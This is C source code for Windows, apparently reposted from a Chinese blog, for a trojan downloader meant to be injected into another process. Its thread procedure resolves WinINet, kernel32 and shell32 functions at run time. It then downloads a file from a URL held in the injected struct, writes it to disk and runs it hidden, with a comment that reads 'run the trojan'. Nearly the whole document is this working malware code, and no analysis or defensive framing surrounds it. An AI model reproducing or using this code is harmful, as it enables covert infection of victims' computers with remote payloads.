1. #include "stdafx.h"
2. #include "stdio.h"
3. #include "string.h"
4. #include
5. #include
6. #include "tlhelp32.h"
7. #pragma comment(lib,"wininet.lib")
8.
9. /***********************************************/
10. typedef HINSTANCE (__stdcall *fun_ShellExecute)(HWND hWnd, //定义 ShellExecute
11. LPCTSTR lpOperation,
12. LPCTSTR lpFile,
13. LPCTSTR lpParameters,
14. LPCTSTR lpDiretory,
15. INT nShowCmd);
16.
17. typedef int (__stdcall *fun_MessageBox)(HWND hWnd, LPCTSTR lpszText, //定义MessageBoxA原型
18. LPCTSTR lpszCaption, UINT nType);
19.
20. // define functions in kernel32.dll
21. typedef HANDLE (__stdcall *fun_CreateFile)( LPCTSTR, DWORD, DWORD, //定义CreateFileA
22. LPSECURITY_ATTRIBUTES,
23. DWORD, DWORD, HANDLE );
24. typedef BOOL (__stdcall *fun_WriteFile)( HANDLE, LPCVOID, DWORD, //定义WriteFile
25. LPDWORD, LPOVERLAPPED );
26. typedef BOOL (__stdcall *fun_CloseHandle)( HANDLE hObject ); //定义CloseHandle
27. typedef HMODULE (__stdcall *fun_GetModuleHandle)(LPCTSTR); //定义GetModuleHandle
28. typedef FARPROC (__stdcall *fun_GetProcAddress)(HMODULE, LPCTSTR); //定义GetProcAddress
29. typedef HINSTANCE (__stdcall *fun_LoadLibrary)(LPCTSTR); //定义LoadLibraryA
30.
31. // define functions in wininet.dll
32. typedef HINTERNET (__stdcall *fun_InternetOpen)(IN LPCTSTR lpszAgent, //定义InternetOpen
33. IN DWORD dwAccessType,
34. IN LPCTSTR lpszProxyByName,
35. IN LPCTSTR lpszProxyByPass,
36. IN DWORD dwFlags);
37. typedef HINTERNET (__stdcall *fun_InternetOpenUrl)(IN HINTERNET hInternet,//定义InternetOpenUrl
38. IN LPCTSTR lpszUrl,
39. IN LPCTSTR lpszHeaders OPTIONAL,
40. IN DWORD dwHeadersLength,
41. IN DWORD dwFlags,
42. IN DWORD dwContext);
43. typedef HINTERNET (__stdcall *fun_InternetReadFile)(IN HINTERNET hFile, //定义InternetReadFile
44. IN LPVOID lpBuffer,
45. IN DWORD dwNumberOfBytesToRead,
46. OUT LPDWORD lpdwNumberOfBytesRead);
47. typedef HINTERNET (__stdcall *fun_InternetCloseHandle)(IN HINTERNET hInternet); //定义InternetCloseHandle
48.
49.
50. typedef struct tag_Inject // define a structure to copy to distance process
51. {
52. fun_GetModuleHandle GetModuleHandle;
53. fun_GetProcAddress GetProcAddress;
54. fun_LoadLibrary LoadLibrary;
55. char szKernel[32];
56. char szUser[32];
57. char szNet[32];
58. char szShell[32];
59. char szMessageBox[32];
60. char szInternetOpen[32];
61. char szInternetOpenUrl[MAX_PATH];
62. char szInternetReadFile[128];
63. char szInternetCloseHandle[32];
64. char szCreateFile[32];
65. char szWriteFile[32];
66. char szCloseHandle[32];
67. char szShellExecute[32];
68. char szHeader[16];
69. char szInterFlag[32];
70. char szOpenFlag[10];
71. char szUrlAddr[MAX_PATH];
72. char szUrlAddr1[MAX_PATH];
73. char szFilePath[MAX_PATH];
74. char szFilePath1[MAX_PATH];
75. }Inject;
76.
77. /***************************************/
78.
79. /************************************************/
80. static BOOL ThreadProc(Inject* Inject_info)
81. {
82. HMODULE hKernel32, hUser32, hWininet, hShell32; //模块句柄
83.
84. fun_InternetOpen j_InternetOpen; //定义函数指针
85. fun_InternetOpenUrl j_InternetOpenUrl;
86. fun_InternetReadFile j_InternetReadFile;
87. fun_InternetCloseHandle j_InternetCloseHandle;
88. fun_CreateFile j_CreateFile;
89. fun_WriteFile j_WriteFile;
90. fun_CloseHandle j_CloseHandle;
91. fun_MessageBox j_MessageBox;
92. fun_ShellExecute j_ShellExecute;
93.
94. hKernel32 = Inject_info->GetModuleHandle(Inject_info->szKernel); //隐式加载DLL
95. if (NULL == hKernel32) //加载失败
96. {
97. hKernel32 = Inject_info->LoadLibrary(Inject_info->szKernel); //显示加载
98. if (NULL == hKernel32) //显示加载失败
99. {
100. return FALSE;
101. }
102. }
103.
104. hUser32 = Inject_info->GetModuleHandle(Inject_info->szUser);
105. if (NULL == hUser32)
106. {
107. hUser32 = Inject_info->LoadLibrary(Inject_info->szUser);
108. if (NULL == hUser32)
109. {
110. return FALSE;
111. }
112. }
113.
114. hWininet = Inject_info->GetModuleHandle(Inject_info->szNet);
115. if (NULL == hWininet)
116. {
117. hWininet = Inject_info->LoadLibrary(Inject_info->szNet);
118. if (NULL == hWininet)
119. {
120. return FALSE;
121. }
122. }
123.
124. hShell32 = Inject_info->GetModuleHandle(Inject_info->szShell);
125. if (NULL == hShell32)
126. {
127. hShell32 = Inject_info->LoadLibrary(Inject_info->szShell);
128. if (NULL == hShell32)
129. {
130. return FALSE;
131. }
132. }
133.
134. j_InternetOpen = (fun_InternetOpen)Inject_info->GetProcAddress(hWininet, //绑定 InternetOpen
135. Inject_info->szInternetOpen);
136. j_InternetOpenUrl = (fun_InternetOpenUrl)Inject_info->GetProcAddress(hWininet, //绑定 InternetOpenUrl
137. Inject_info->szInternetOpenUrl);
138. j_InternetReadFile = (fun_InternetReadFile)Inject_info->GetProcAddress(hWininet, //绑定 InternetReadFile
139. Inject_info->szInternetReadFile);
140. j_InternetCloseHandle = (fun_InternetCloseHandle)Inject_info->GetProcAddress(hWininet, //绑定 InternetCloseHandle
141. Inject_info->szInternetCloseHandle);
142.
143. j_CreateFile = (fun_CreateFile)Inject_info->GetProcAddress(hKernel32, //绑定 CreateFile
144. Inject_info->szCreateFile);
145. j_WriteFile = (fun_WriteFile)Inject_info->GetProcAddress(hKernel32, //绑定 WriteFile
146. Inject_info->szWriteFile);
147. j_CloseHandle = (fun_CloseHandle)Inject_info->GetProcAddress(hKernel32, //绑定 CloseHandle
148. Inject_info->szCloseHandle);
149. j_MessageBox = (fun_MessageBox)Inject_info->GetProcAddress(hUser32, //绑定 MessageBox
150. Inject_info->szMessageBox);
151. j_ShellExecute = (fun_ShellExecute)Inject_info->GetProcAddress(hShell32, //绑定 ShellExecute
152. Inject_info->szShellExecute);
153. HINTERNET hNet, hFile; //定义网络句柄和文件句柄
154.
155. hNet = j_InternetOpen(Inject_info->szInterFlag, INTERNET_OPEN_TYPE_PRECONFIG,
156. NULL, NULL, 0); //打开网络并返回网络句柄
157. if (NULL == hNet) //打开网络出错
158. {
159. return FALSE;
160. }
161.
162. hFile = j_InternetOpenUrl(hNet, Inject_info->szUrlAddr, Inject_info->szHeader,
163. strlen(Inject_info->szHeader),
164. INTERNET_FLAG_DONT_CACHE|INTERNET_FLAG_RELOAD, 0); //打开指定的URL并返回请求的URL的资源句柄
165. if (NULL == hFile) //打开网络地址出错
166. {
167. return FALSE;
168. }
169.
170. char buff[1024]; //数据传输缓存
171. DWORD dwRead, //字节数
172. dwWritten = NULL; //实际写入的字节数
173.
174. HANDLE hCreateFile = j_CreateFile(Inject_info->szFilePath, GENERIC_READ|GENERIC_WRITE, //始终创建文件
175. 0, NULL, CREATE_ALWAYS, 0 ,NULL);
176. if (NULL == hCreateFile) //创建文件出错!
177. {
178. return FALSE;
179. }
180. while(j_InternetReadFile(hFile, buff, 1023, &dwRead))
181. {
182. if (0 == dwRead) //如果传输出错,退出
183. break;
184. j_WriteFile(hCreateFile, buff, dwRead, &dwWritten, NULL); //将读取到的数据写入本地文件
185.
186. }
187. j_InternetCloseHandle(hNet); //关闭网络句柄
188. j_InternetCloseHandle(hFile); //关闭网络文件句柄
189. j_CloseHandle(hCreateFile); //关闭本地文件句柄
190.
191. j_ShellExecute(NULL, NULL, Inject_info->szFilePath, NULL, NULL, SW_HIDE); //运行木马
192.
193.
194. return TRUE;
195. }
196.
本文转自 ☆★ 包罗万象 ★☆ - 转载请注明出处,侵权必究!
原文链接:
阅读(755) | 评论(0) | 转发(0) |